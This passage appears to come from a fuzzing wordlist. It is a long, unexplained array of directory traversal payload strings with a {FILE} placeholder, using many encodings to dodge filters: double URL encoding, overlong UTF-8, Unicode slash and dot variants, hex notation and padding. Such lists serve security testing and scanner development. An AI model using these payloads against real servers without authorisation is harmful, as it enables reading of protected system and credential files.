%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","\\../{FILE}","\\../\\../{FILE}","\\../\\../\\../{FILE}","\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../\\../\\../{FILE}","/..\\{FILE}","/..\\/..\\{FILE}","/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",".../{FILE}",".../.../{FILE}",".../.../.../{FILE}",".../.../.../.../{FILE}",".../.../.../.../.../{FILE}",".../.../.../.../.../.../{FILE}",".../.../.../.../.../.../.../{FILE}",".../.../.../.../.../.../.../.../{FILE}","...\\{FILE}","...\\...\\{FILE}","...\\...\\...\\{FILE}","...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\...\\...\\...\\{FILE}","..../{FILE}","..../..../{FILE}","..../..../..../{FILE}","..../..../..../..../{FILE}","..../..../..../..../..../{FILE}","..../..../..../..../..../..../{FILE}","..../..../..../..../..../..../..../{FILE}","..../..../..../..../..../..../..../..../{FILE}","....\\{FILE}","....\\....\\{FILE}","....\\....\\....\\{FILE}","....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\....\\....\\....\\{FILE}","........................................................................../{FILE}","........................................................................../../{FILE}","........................................................................../../../{FILE}","........................................................................../../../../{FILE}","........................................................................../../../../../{FILE}","........................................................................../../../../../../{FILE}","........................................................................../../../../../../../{FILE}","........................................................................../../../../../../../../{FILE}","..........................................................................\\{FILE}","..........................................................................\\..\\{FILE}","..........................................................................\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%u2215{FILE}","..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","..%u2216{FILE}","..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%uEFC8{FILE}","..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uF025{FILE}","..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","..0x2f{FILE}","..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","..0x5c{FILE}","..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","..%c0%2f{FILE}","..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","..%c0%5c{FILE}","..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","///%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","\\\\\\%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..//{FILE}","..//..//{FILE}","..//..//..//{FILE}","..//..//..//..//{FILE}","..//..//..//..//..//{FILE}","..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//..//{FILE}","..///{FILE}","..///..///{FILE}","..///..///..///{FILE}","..///..///..///..///{FILE}","..///..///..///..///..///{FILE}","..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///..///{FILE}","..\\\\{FILE}","..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\\\{FILE}","..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","./\\/./{FILE}","./\\/././\\/./{FILE}","./\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",".\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\